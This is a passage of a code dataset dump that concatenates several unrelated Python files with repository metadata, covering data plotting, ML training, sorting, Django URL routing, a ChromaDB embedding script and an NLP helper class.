b])\n","repo_name":"crcady/hammer","sub_path":"src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8357978931","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.ndimage.filters import gaussian_filter1d\n\nsns.set_style('darkgrid') # darkgrid, white grid, dark, white and ticks\nplt.rc('axes', titlesize=14) # fontsize of the axes title\nplt.rc('axes', labelsize=10) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=8) # fontsize of the tick labels\nplt.rc('ytick', labelsize=10) # fontsize of the tick labels\nplt.rc('legend', fontsize=12) # legend fontsize\nplt.rc('font', size=12) # controls default text sizes\n\nsad = pd.read_csv('~/Documents/Songaday/songaday.csv')\nmood_scores = pd.read_csv('~/Documents/Songaday/mood_scores.csv')\nmood_sorted = pd.read_csv('~/Documents/Songaday/mood_sorted.csv')\nlocation_grp = pd.read_csv('~/Documents/Songaday/location_grp.csv')\n\nsad2 = pd.DataFrame(sad['length'].str.split(':').tolist(), index= sad.index)\nsad['length'] = pd.to_numeric(sad2[0])*60+pd.to_numeric(sad2[1])\nsad['YTid'] = sad['videoID'].str.replace(r'^(.*)(/)','').str.replace(r'^(.*)(v\\=)','')\nsad_ids = ','.join(sad['YTid'])\n\nif __name__ == \"__main__\":\n results = getYTstats(sad_ids)\n\nids = list()\nviews = list()\nlikes = list()\ncomments = list()\nfor i in list(range(len(results))):\n ids.append( results[i]['id'] )\n views.append( results[i]['statistics']['viewCount'] )\n likes.append( results[i]['statistics']['likeCount'] )\n comments.append( results[i]['statistics']['commentCount'] )\n\n\n\nsad['tempo'] = pd.to_numeric(sad['tempo'],errors='coerce')\nsad['date'] = sad['date'].str.replace('.','/')\nsad2 = pd.DataFrame(sad.date.str.split('/').tolist(), index= sad.index)\nsad['date'] = pd.to_datetime(dict(year=pd.to_numeric(sad2[2]), month=pd.to_numeric(sad2[0]), day=pd.to_numeric(sad2[1]) ))\nsad['yearmonth'] = sad['date'].dt.year.map(str) + \"-\" + ('0'+sad['date'].dt.month.map(str)).str.strip().str[-2:4]\nsad['yearweek'] = sad['date'].dt.strftime('%Y-%U')\nsad['datetimemonth'] = pd.to_datetime(sad['yearmonth'], format='%Y-%m')\nsad = pd.merge(sad,mood_sorted,on='mood',how='left')\nsad = pd.merge(sad,mood_scores,on='mood',how='left')\nsad = pd.merge(sad,location_grp,on='location',how='left')\nsad['mood score'] = sad['score']\n\nsad.to_csv('~/Documents/Songaday/modified.csv')\n\n\n#Average out the numeric number on categorical bar chart\ndef bar_with_categorical_numeric_avg(sad,categorical_x,numeric_param):\n plt.figure(figsize=(16,4), tight_layout=True)\n colors = sns.color_palette('pastel')\n plottable = sad.groupby([categorical_x],as_index=False).agg({'title':'count',numeric_param:'mean'})\n plottable = plottable[plottable['title']>10]\n plt.bar(plottable[categorical_x], plottable[numeric_param], color=colors)\n plt.xlabel(categorical_x.title())\n plt.ylabel('Avg '+numeric_param)\n plt.title(numeric_param.title()+' based on '+categorical_x.title())\n plt.show()\n\n#Bubble graph with two categorical axes and bubble size is occurrence\ndef bubble_with_categorical_mood(sad,categorical_x):\n plt.figure(figsize=(70,5), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby([categorical_x,'mood_sorted','mood'],as_index=False).agg({'title':'count'})\n plottable = plottable[plottable['title']>20]\n plottable = plottable.sort_values(by='mood_sorted')\n plottable['title'] *= 3\n x_axis = categorical_x.title()\n plt.scatter(x=categorical_x, y=\"mood\", s=\"title\", data=plottable, color = colors[2])\n plt.xlabel(categorical_x)\n plt.ylabel('Mood')\n plt.title(x_axis+' vs Mood')\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n plt.show()\n\n#Line graph where y-axis is numeric and x-axis is yearmonth\ndef line_overtime(sad,numeric_line):\n plt.figure(figsize=(80,7), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby(['yearmonth'], as_index=False).mean(numeric_line)\n plottable = plottable[['yearmonth',numeric_line]]\n smoothed = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n plt.plot(plottable['yearmonth'], smoothed,'ko-',color=colors[0], markersize=4)\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n plt.xticks(rotation=90)\n plt.show()\n\n#Line graph where x-axis is categorical\ndef line_with_categorical_x(sad,categorical_x,numeric_line):\n plt.figure(figsize=(70,5), tight_layout=True)\n colors = sns.color_palette('Set2')\n plottable = sad.groupby([categorical_x],as_index=False).agg({'title':'count',numeric_line:'mean'})\n plottable = plottable[plottable['title']>50]\n plottable = plottable.sort_values(by=numeric_line)\n smoothed = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n plt.plot(plottable[categorical_x], smoothed,'ko-',color=colors[1], markersize=4)\n plt.rc('xtick', labelsize=7) # fontsize of the tick labels\n if numeric_line=='score': y_axis = 'Mood score'\n else: y_axis = numeric_line\n plt.title(y_axis + ' vs ' + categorical_x)\n plt.show()\n\n\nbar_with_categorical_numeric_avg(sad,'mood','tempo')\nbar_with_categorical_numeric_avg(sad,'mood','length')\n\nline_overtime(sad,'tempo')\nline_overtime(sad,'length')\nline_overtime(sad,'mood score')\n\n\n#Mood count over time (line)\nplot_time_mood = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_select = plot_time_mood[plot_time_mood['mood'].isin(['Sad','Happy','Angry','Excited'])]\n\ndef assignMood(olddf,moodname):\n newdf = olddf[olddf['mood']==moodname]\n newdf = newdf.rename(columns={'title': moodname})\n newdf = newdf.drop('mood', 1)\n return newdf\n\nplot_time_happy = assignMood(plot_time_mood,'Happy')\nplot_time_sad = assignMood(plot_time_mood,'Sad')\nplot_time_angry = assignMood(plot_time_mood,'Angry')\nplot_time_excited = assignMood(plot_time_mood,'Excited')\nnewdf = pd.merge(plot_time_happy,plot_time_sad,on='yearmonth',how='outer')\nnewdf = pd.merge(newdf,plot_time_angry,on='yearmonth',how='outer')\nnewdf = pd.merge(newdf,plot_time_excited,on='yearmonth',how='outer')\nnewdf = newdf.sort_values(by='yearmonth')\nnewdf = newdf.fillna(0)\nnewdf['HappyExcited'] = newdf['Happy']+newdf['Excited']\nnewdf['SadAngry'] = newdf['Sad']+newdf['Angry']\nHE_smoothed = gaussian_filter1d(newdf['HappyExcited'], sigma=1.5)\nSA_smoothed = gaussian_filter1d(newdf['SadAngry'], sigma=1.5)\n\nplt.figure(figsize=(80,6), tight_layout=True)\ncolors = sns.color_palette('pastel')\nline0 = plt.plot(newdf['yearmonth'], HE_smoothed,'ko-',label='Happy+Excited', color = colors[2], markersize=4)\nline1 = plt.plot(newdf['yearmonth'], SA_smoothed,'ro-',label='Sad+Angry', color = colors[3], markersize=4)\nplt.xticks(rotation=90)\nplt.xlabel('Month')\nplt.ylabel('# of times')\nplt.title('Mood per month')\nplt.legend(loc=\"upper left\")\nplt.show()\n\n#Bubble graph for all\nplt.figure(figsize=(80,6), tight_layout=True)\ncolors = sns.color_palette('Set2')\nplot_time_score = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_score['title'] *= 30\nplt.scatter(x=\"yearmonth\", y=\"mood\", s=\"title\", data=plot_time_score, color = colors[0])\nplt.rc('xtick', labelsize=7) # fontsize of the tick labels\nplt.xticks(rotation=90)\nplt.show()\n\n#Moods over categories\nbubble_with_categorical_mood(sad,'main instrument')\nbubble_with_categorical_mood(sad,'location')\n\n#Bubble graph for select /// NOT SAVED\nplt.figure(figsize=(80,5), tight_layout=True)\ncolors = sns.color_palette('pastel')\nplot_time_moodcount = sad.groupby(['yearmonth','mood'], as_index=False)['title'].count()\nplot_time_moodcount = plot_time_moodcount[plot_time_moodcount['mood'].isin(['Happy','Excited','Angry','Sad'])]\nplot_time_moodcount['title'] *= 40\nplt.scatter(x=\"yearmonth\", y=\"mood\", s=\"title\", data=plot_time_moodcount)\nplt.rc('xtick', labelsize=7) # fontsize of the tick labels\nplt.xticks(rotation=90)\nplt.show()\n\n#Mood score over categories\nline_with_categorical_x(sad,'location','score')\nline_with_categorical_x(sad,'location_grp','score')\nline_with_categorical_x(sad,'main instrument','score')\nline_with_categorical_x(sad,'main style','score')\nline_with_categorical_x(sad,'topic','score')\nline_with_categorical_x(sad,'inKey','score')\nline_with_categorical_x(sad,'topic','length')\nline_with_categorical_x(sad,'main instrument','length')\n\n\n\nnumeric_line = 'mood score'\nplottable = sad.groupby(['yearmonth'], as_index=False).mean('mood score')\nplottable = plottable[['yearmonth',numeric_line]]\nsmoothed1 = gaussian_filter1d(plottable[numeric_line], sigma=1.5)\n\n\nplottable = sad.groupby(['yearmonth'],as_index=False).agg({'title':'count','mood score':'mean','tempo':'mean'})\nsmoothed1 = gaussian_filter1d(plottable['mood score'], sigma=1.5)\nsmoothed2 = gaussian_filter1d(plottable['tempo'], sigma=1.5)\n\ncolors = sns.color_palette('Set2')\nfig, ax = plt.subplots(figsize=(12,5))\nax2 = ax.twinx()\nax.plot(plottable['yearmonth'], smoothed1,'ko-',color=colors[0], markersize=4)\nax2.plot(plottable['yearmonth'], smoothed2,'ko-',color=colors[1], markersize=4)\nplt.show()\n\n\n\nplt.xlabel(categorical_x)\nplt.ylabel('Mood')\nplt.title(x_axis+' vs Mood')\nplt.rc('xtick', labelsize=7) # fontsize of the tick labels\n","repo_name":"chainleft/Songaday","sub_path":"songaday.py","file_name":"songaday.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25971703339","text":"from sklearn.ensemble import BaggingClassifier\r\n\r\n# Bagged KNN\r\nmodel = BaggingClassifier(base_estimator=KNeighborsClassifier(\r\n n_neighbors=3), random_state=0, n_estimators=700)\r\nmodel.fit(train_X, train_Y)\r\nprediction = model.predict(test_X)\r\nprint('The accuracy for bagged KNN is:',\r\n metrics.accuracy_score(prediction, test_Y))\r\nresult = cross_val_score(model, X, Y, cv=10, scoring='accuracy')\r\nprint('The cross validated score for bagged KNN is:', result.mean())\r\n\r\n# Bagged DecisionTree\r\nmodel = BaggingClassifier(\r\n base_estimator=DecisionTreeClassifier(), random_state=0, n_estimators=100)\r\nmodel.fit(train_X, train_Y)\r\nprediction = model.predict(test_X)\r\nprint('The accuracy for bagged Decision Tree is:',\r\n metrics.accuracy_score(prediction, test_Y))\r\nresult = cross_val_score(model, X, Y, cv=10, scoring='accuracy')\r\nprint('The cross validated score for bagged Decision Tree is:', result.mean())\r\n","repo_name":"kmsk99/data_science_toolbar","sub_path":"modeling/machine_learning/ensembling/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13550036539","text":"'''\r\n11b. Python and DataScience \r\n a) Load the ‘Student Performance’ dataset into one of the data structures (NumPy or Pandas).\r\n\tb)Display header rows and description of the loaded dataset.\r\n\tc) Remove unnecessary features (E.g. drop unwanted columns) from the dataset such as ‘lunch’ and ‘test preparation course’ .\r\n\td) Manipulate data by replacing empty column values in ‘parental level of education’ with a default value.\r\n\te) Perform the following visualization on the loaded dataset: Tally of the Number of Male & Female students who took up the ‘test preparation course’ and those who did not. \r\n'''\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndata=pd.read_excel(\"StudentsPerformance.xlsx\")\r\n\r\nprint(data.head())\r\nprint(data.describe())\r\nprint(data.info(verbose=True))\r\naxis=sns.countplot(x='gender',hue=\"test preparation course\",data=data)\r\nplt.show()\r\ndata.drop([\"lunch\",\"test preparation course\"],inplace=True,axis=1)\r\nprint(list(data.columns))\r\ndata[\"parental level of education\"]=data[\"parental level of education\"].fillna('NONE')\r\nprint(data[\"parental level of education\"])\r\n\r\n\r\n\r\n\r\n","repo_name":"KritikaChoudhary/Scripting-Languages-Lab","sub_path":"SEE/11b.py","file_name":"11b.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71630085546","text":"from math import ceil\n\ndef merge(array, start, mid, end):\n\tif not (end < len(array)):\n\t\treturn\n\taux = array.copy()\n\tj, left, right = start, start, mid\n\t\n\t# Merge the two arrays until overflow one of them\n\twhile left < mid and right <= end:\n\t\tif aux[left] > aux[right]:\n\t\t\tarray[j] = aux[right]\n\t\t\tright += 1\n\t\telif aux[left] <= aux[right]:\n\t\t\tarray[j] = aux[left]\n\t\t\tleft += 1\n\t\tj += 1\n\t# Copy the rest of left array in case of right array overflow\n\twhile left < mid:\n\t\tarray[j] = aux[left]\n\t\tleft = left + 1\n\t\tj += 1\n\t# Copy the rest of right array in case of left array overflow\n\twhile right <= end:\n\t\tarray[j] = aux[right]\n\t\tright += 1\n\t\tj += 1\n\ndef merge_sort(array):\n\tstart = 0\n\tend = len(array) - 1\n\n\tdef _merge_sort(array, start, end):\n\t\tmid = ceil((end + start)/2)\n\t\tif (start < end):\n\t\t\t_merge_sort(array, start, mid - 1)\n\t\t\t_merge_sort(array, mid, end)\n\t\t\tmerge(array, start, mid, end)\n\n\t_merge_sort(array, start, end)\n\ndef merge_sort_i(array):\t\n\tblock = 1\n\tarraySize = len(array)\n\twhile block < arraySize:\n\t\tmid = block\n\t\tstart = 0\n\t\tend = mid + block - 1\n\t\twhile mid < arraySize:\n\t\t\tmerge(array, start, mid, min(end, arraySize - 1))\n\t\t\tstart = end + 1\n\t\t\tmid = end + block + 1\n\t\t\tend = mid + block - 1\n\t\tblock *= 2 \n\ndef is_sorted(array):\n\t'''\n\tReturn true if the given array is sorted ascending\n\ttype array: list\n\trype: boolean\n\t'''\n\tminElement = float(\"-inf\")\n\tfor element in array:\n\t\tif minElement > element:\n\t\t\treturn False\t\n\t\tminElement = element\n\treturn True\n\nif __name__ == '__main__':\n\tfrom random import sample\n\n\tfor s in range(1,11):\n\t\tprint('Merge Sort random test -', s)\t\t\n\t\tarr = sample(range(100), 10)\n\t\tprint(arr, \" is sorted? \", is_sorted(arr))\n\t\tmerge_sort_i(arr)\n\t\tprint(arr, \" is sorted? \", is_sorted(arr))\n\t\tprint('\\n')","repo_name":"gedhean/data-structures","sub_path":"algorithms/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37058807336","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\nstudent_grades = np.random.normal(68, 15, 50)\n\n# Plot data\nbins = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\nplt.hist(student_grades, bins=bins, edgecolor='black')\n\n# Create labels\nplt.xlabel('Grades')\nplt.ylabel('Number of Students')\nplt.title('Project A')\n\n# Format\nplt.xlim(0, 100)\nplt.xticks(ticks=bins)\nplt.ylim(0, 30)\n\nplt.show()\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"math/0x01-plotting/4-frequency.py","file_name":"4-frequency.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22588337008","text":"# This file embeds the answers and saved it in a csv file which acts as a vector database (one can use Pinecone, chromadb etc.)\n\nimport read_data as rd\nimport chromadb\nfrom chromadb.utils import embedding_functions\n\nquestions, answers, q_ids = rd.get_all_questions_answers()\n\n# It is important to have persistent client for future retrievals\nchroma_client = chromadb.PersistentClient('q_a')\n\nsentence_transformer_ef = embedding_functions.SentenceTransformerEmbeddingFunction(model_name=\"all-MiniLM-L6-v2\")\n\ncollection = chroma_client.create_collection(name=\"embed_data_new\")\nq_ids = list(map(str, q_ids))\n\ncollection.add(\n documents = answers,\n embeddings = sentence_transformer_ef(answers),\n ids = q_ids\n)\n\n\n\n","repo_name":"ju7stritesh/PromptSystemArchitecture","sub_path":"embed_answers_chromadb.py","file_name":"embed_answers_chromadb.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24253242632","text":"from django.conf.urls import url, include\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView\nfrom django.views.generic import DeleteView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom django.contrib.auth import views\nfrom projects.filters import ThesisInfoFilter, MeetingInfoFilter, NoticeFilter\nfrom projects.form import ThesisInfoAddForm, MeetingInfoAddForm, NoticeAddForm\nfrom .models import ThesisInfo, MeetingInfo,Notice\nfrom .views import *\n\napp_name = 'projects'\n\nurlpatterns = [\n url(r'^login/$', login,\n {'template_name': 'projects/myuser/login.html'},name='userLogin'),\n url(r'^logout/$', views.logout, {'template_name': 'projects/myuser/login.html'}, name='logout'),\n\n url(r'^index$', indexView, name='index'),\n\n #thesisInfo\n url(r'^thesisInfoList$',\n ThesisInfoListView.as_view(model=ThesisInfo, filterset_class=ThesisInfoFilter, template_name='projects/thesisInfo/list.html',\n paginate_by=7),name='thesisInfoList'),\n url(r'^thesisInfoAdd$',add, name='thesisInfoAdd'),\n url(r'^thesisInfo/(?P[0-9]+)/$', DetailView.as_view(model=ThesisInfo, template_name='projects/thesisInfo/detail.html'),\n name='thesisInfoDetail'),\n url(r'^(?P[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoUpdate'),\n url(r'^(?P[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoReview'),\n url(r'^(?P[0-9]+)/updatethesisInfo$', UpdateView.as_view(model=ThesisInfo, form_class=ThesisInfoAddForm,\n template_name='projects/thesisInfo/update.html',\n success_url=reverse_lazy('projects:thesisInfoList')),\n name='thesisInfoCheck'),\n url(r'^(?P[0-9]+)/deletethesisInfo$',\n DeleteView.as_view(model=ThesisInfo, success_url=reverse_lazy('projects:thesisInfoList')), name='thesisInfoDelete'),\n #meetingInfo\n url(r'^meetingInfoList$',\n MeetingInfoListView.as_view(model=MeetingInfo, filterset_class=MeetingInfoFilter,\n template_name='projects/meetingInfo/list.html',\n paginate_by=7), name='meetingInfoList'),\n url(r'^meetingInfoAdd$',\n CreateView.as_view(model=MeetingInfo, template_name='projects/meetingInfo/add.html',\n form_class=MeetingInfoAddForm,\n success_url=reverse_lazy('projects:meetingInfoList')), name='meetingInfoAdd'),\n url(r'^meetingInfo/(?P[0-9]+)/$',\n DetailView.as_view(model=MeetingInfo, template_name='projects/meetingInfo/detail.html'),\n name='meetingInfoDetail'),\n url(r'^(?P[0-9]+)/updatemeetingInfo$', UpdateView.as_view(model=MeetingInfo, form_class=MeetingInfoAddForm,\n template_name='projects/meetingInfo/update.html',\n success_url=reverse_lazy('projects:meetingInfoList')),\n name='meetingInfoUpdate'),\n url(r'^(?P[0-9]+)/deletemeetingInfo$',\n DeleteView.as_view(model=MeetingInfo, success_url=reverse_lazy('projects:meetingInfoList')),\n name='meetingInfoDelete'),\n #notice\n url(r'^noticeList$',\n NoticeListView.as_view(model=Notice, filterset_class= NoticeFilter,\n template_name='projects/notice/list.html',\n paginate_by=7), name='noticeList'),\n url(r'^noticeAdd$',\n CreateView.as_view(model=Notice, template_name='projects/notice/add.html',\n form_class=NoticeAddForm,\n success_url=reverse_lazy('projects:noticeList')), name='noticeAdd'),\n url(r'^notice/(?P[0-9]+)/$',\n DetailView.as_view(model=Notice, template_name='projects/notice/detail.html'),\n name='meetingInfoDetail'),\n url(r'^(?P[0-9]+)/updatenotice$', UpdateView.as_view(model=Notice, form_class=NoticeAddForm,\n template_name='projects/notice/update.html',\n success_url=reverse_lazy('projects:noticeList')),\n name='noticeUpdate'),\n url(r'^(?P[0-9]+)/deletenotice$',\n DeleteView.as_view(model=Notice, success_url=reverse_lazy('projects:noticeList')),\n name='noticeDelete'),\n]\n","repo_name":"iakisme/academic","sub_path":"projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19659795877","text":"\nfrom django.shortcuts import render,redirect\nfrom .forms import profileform, UsercreateForm, userupdateform\nfrom django.contrib import messages\nfrom django.contrib.auth import login,authenticate\nfrom django.views.generic import CreateView\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\n# Create your views here.\n\n\n\n\ndef profilepage(request):\n if request.method==\"POST\":\n user_form= userupdateform(request.POST,instance=request.user)\n profile_form=profileform(request.POST,request.FILES,instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save() \n messages.success(request,f'Profile created successfully!!')\n return render(request,'home.html')\n else:\n user_form=userupdateform(instance=request.user)\n profile_form=profileform(instance=request.user.profile)\n messages.error(request, f'There seems to be an error in the form')\n \n return render(request,'profile.html', {'form':user_form,'p_form':profile_form}) \n\ndef accountsetting(request):\n if request.method==\"POST\":\n form=userupdateform(request.POST,instance=request.user)\n profile_form=profileform(request.POST,request.FILES)\n if form.is_valid() and profile_form.is_valid():\n form.save()\n profile_form.save()\n return redirect('destination')\n else:\n form=userupdateform()\n profile_form=profileform()\n return render(request, 'preferencesinfo.html',{'f':form,'p':profile_form}) \n\n\n\ndef registerpage(request):\n if request.method==\"POST\":\n user_form=UsercreateForm(request.POST)\n \n\n if user_form.is_valid() :\n user_form.save()\n u_name = user_form.cleaned_data.get('username')\n messages.success(request,f'Account created successfully for {u_name} !!')\n return redirect('login')\n\n \n \n\n \n \n\n else:\n user_form=UsercreateForm() \n return render(request,'registeruser.html',{'form':user_form}) \n\n","repo_name":"DipinMainali/hamroproject","sub_path":"registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33022989583","text":"print(\"Welcome to the rollercoaster!\")\n\nheight = int(input(\"What is your height in cm? \"))\nage = int(input(\"What is your age? \"))\nbill = 0\n\nif height >= 120:\n if age < 12:\n bill = 5\n elif age <= 18:\n bill = 7\n else:\n bill = 12\n \n wants_photo = input(\"Do you want a photo taken? yes or no: \")\n if wants_photo == \"yes\":\n bill += 3\n \n print(f\"Your bill is {bill}\")\nelse:\n print(\"You can't ride the rollercoaster!\")\n","repo_name":"itsmeshibintmz/100-Days-of-Code-Mastering-Python","sub_path":"day-4/multiple-if-statements/rollercoaster-exercise-2.py","file_name":"rollercoaster-exercise-2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34836345483","text":"from validations.decorators import get_atributes\n\n\nclass Products:\n _products_db = {}\n def __init__(self, **kwargs):\n if len(kwargs) > 0:\n self.__id = self.get_id\n self.__name = kwargs.get('name')\n self.__cantidity = kwargs.get('cantidity')\n self.__unit_price = kwargs.get('unit_price')\n self.__set_atributes\n \n @property\n def get_id(self):\n keys = list(self._products_db.keys())\n keys = 0 if len(keys) == 0 else keys[-1]\n return keys + 1\n \n @get_atributes\n def get_atributes(self, data: dict):\n return data\n \n @property\n def __set_atributes(self):\n data = self.get_atributes(self).copy()\n id = data.get('id')\n data.pop('id')\n self._products_db[id] = data\n print(f\"El id para {data.get('name')} es {id}\")\n \n @property\n def get_db_products(self):\n print(f\"\\n{'id': ^4}|{'nombre': ^30}|{'cantidad': ^10}|{'precio unitario': ^15}\")\n if not(len(self._products_db) > 0):\n print('No existe ningun producto aún\\n')\n return None\n for keys, values in self._products_db.items():\n dato = lambda key: values.get(key)\n print(f\"{keys: <4}|{dato('name')[:30]: <30}|{str(dato('cantidity'))[:15]: <10}|{str(dato('unit_price'))[:15]: <15}\")\n else:\n print(\"\\n\")\n \n def change_atributes(self, id, *args):\n for i in args:\n if self._products_db.get(id) == None:\n print('Ese producto no existe')\n return None\n elif self._products_db.get(id).get(i) == None:\n print(f'Usted no tiene el dato \"{i}\"')\n continue\n new_value = input(f\"Digite el nuevo dato para {i}: \")\n try:\n if i == 'cantidity' and int(new_value) < 0:\n print('La cantidad no se permite menor a cero')\n return None\n if i == 'cantidity':\n new_value = int(new_value)\n if i == 'unit_price' and int(new_value) < 0:\n print('La precio no se permite menor a cero')\n return None\n if i == 'unit_price':\n new_value = float(new_value)\n except Exception as e:\n print('Error de formato')\n return None\n self._products_db[id][i] = new_value\n print('Cambio exitoso')\n \n def drop_products_db(self, id):\n if self._products_db.get(id) == None:\n print(f'Ese id no existe')\n return None\n self._products_db.pop(id)\n print('Se elimino exitosamente')\n \n def request_id(self, id):\n return id in list(self._products_db.keys())\n \n def list_all_data(self):\n return self._products_db","repo_name":"ArturoDeveloment/Management_products","sub_path":"controllers/Productos.py","file_name":"Productos.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25491212914","text":"import torch\nfrom accelerate import Accelerator\nfrom tqdm.autonotebook import tqdm\nfrom transformers import get_linear_schedule_with_warmup, get_constant_schedule_with_warmup\n\n\ndef collate_fn(tknz):\n def func(batch):\n x,y = [i[0] for i in batch], [i[1] for i in batch]\n \n encoding = tknz(x,padding=\"longest\",max_length=256,truncation=True,return_tensors=\"pt\")\n input_ids, attention_mask = encoding.input_ids, encoding.attention_mask\n target_encoding = tknz(y,padding=\"longest\",max_length=256,truncation=True,return_tensors=\"pt\")\n labels = target_encoding.input_ids\n labels[labels == tknz.pad_token_id] = -100\n return dict(input_ids=input_ids, attention_mask=attention_mask, labels=labels, text=(x,y))\n return func\n\n\n\n\ndef train(model, tokenizer, train_loader, test_loader=None, epoch=1, fp16=True, lr=1e-5, warmup=0.1, pbar=True, update_every=1):\n\n accelerator = Accelerator(gradient_accumulation_steps=update_every, mixed_precision='fp16' if fp16 else 'no')\n\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr)\n model, optimizer, train_loader, test_loader = accelerator.prepare(model, optimizer, train_loader, test_loader)\n schedule = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=int(warmup*epoch*len(train_loader)//update_every),\n num_training_steps=epoch*len(train_loader)//update_every)\n\n\n for ep in range(epoch):\n model.train()\n for batch_idx, input_info in enumerate(tqdm(train_loader) if pbar else train_loader):\n with accelerator.accumulate(model):\n loss = model(input_ids=input_info['input_ids'], attention_mask=input_info['attention_mask'], labels=input_info['labels']).loss\n accelerator.backward(loss)\n optimizer.step()\n optimizer.zero_grad()\n if warmup is not None and not accelerator.optimizer_step_was_skipped and batch_idx % update_every == 0:\n schedule.step()\n if batch_idx % 100 == 0:\n print(f'Epoch: {ep+1}/{epoch}, Batch: {batch_idx}/{len(train_loader)}, Loss: {loss.item()*update_every:.4f}')\n \n if test_loader is not None:\n model.eval()\n total_loss = 0\n total = 0\n with torch.no_grad():\n for batch_idx, input_info in enumerate(tqdm(test_loader) if pbar else test_loader):\n loss = model(input_ids=input_info['input_ids'], attention_mask=input_info['attention_mask'], labels=input_info['labels']).loss\n total_loss += loss.item()*input_info['input_ids'].shape[0]\n total += input_info['input_ids'].shape[0]\n print(f'Epoch: {ep+1}/{epoch}, Test Loss: {total_loss/total:.4f}')\n for input_info in test_loader:\n outputs = model.generate(input_info['input_ids'], attention_mask=input_info['attention_mask'], max_length=256, num_beams=4, early_stopping=True)\n for input_id, pred, target in zip(input_info['input_ids'], outputs, input_info['text'][1]):\n print(f'Input: {tokenizer.decode(input_id, skip_special_tokens=True)}\\nPred: {tokenizer.decode(pred, skip_special_tokens=True)}\\nTarget: {target}\\n')\n break\n break\n \n\n\n","repo_name":"chenyn66/fol_pretrain","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30354818994","text":"import matplotlib.pyplot as plt\r\nfrom ltp import LTP\r\nimport numpy as np\r\nimport pandas as pd\r\nimport json\r\n\r\nclass centext_ltp():\r\n def __init__(self,sents):\r\n '''\r\n 自然语言处理类,用于实现各自然语言处理技术。\r\n :param sents: 输出句子\r\n '''\r\n self.ltp = LTP(path='pretrained_model') # 默认加载 Small 模型\r\n self.sents = sents\r\n def __len__(self):\r\n # 计算句子长度\r\n return len(\"\".join(self.sents))\r\n def sent_split(self):\r\n # 句子分句\r\n return self.ltp.sent_split(self.sents)\r\n def seg(self):\r\n # 句子分词\r\n seg, hidden = self.ltp.seg([sent for sent in self.sent_split()])\r\n return seg, hidden\r\n def pos(self):\r\n # 词性标注\r\n seg, hidden = self.seg()\r\n return self.ltp.pos(hidden)\r\n def ner(self):\r\n # 命名实体识别\r\n seg, hidden = self.seg()\r\n return self.ltp.ner(hidden)\r\n\r\ndef fanyi_language_count(df):\r\n # 各翻译引擎翻译各语种数量柱状图构建\r\n plt.style.use('ggplot')\r\n plt.rcParams[\"font.sans-serif\"] = ['SimHei']\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n language_lists = ['汉语', '英语', '日语', '韩语']\r\n x_data = language_lists\r\n x_width = [i for i in range(len(x_data))]\r\n for fanyi_key in fanyi_lists:\r\n y_data = []\r\n for language_key in language_lists:\r\n # 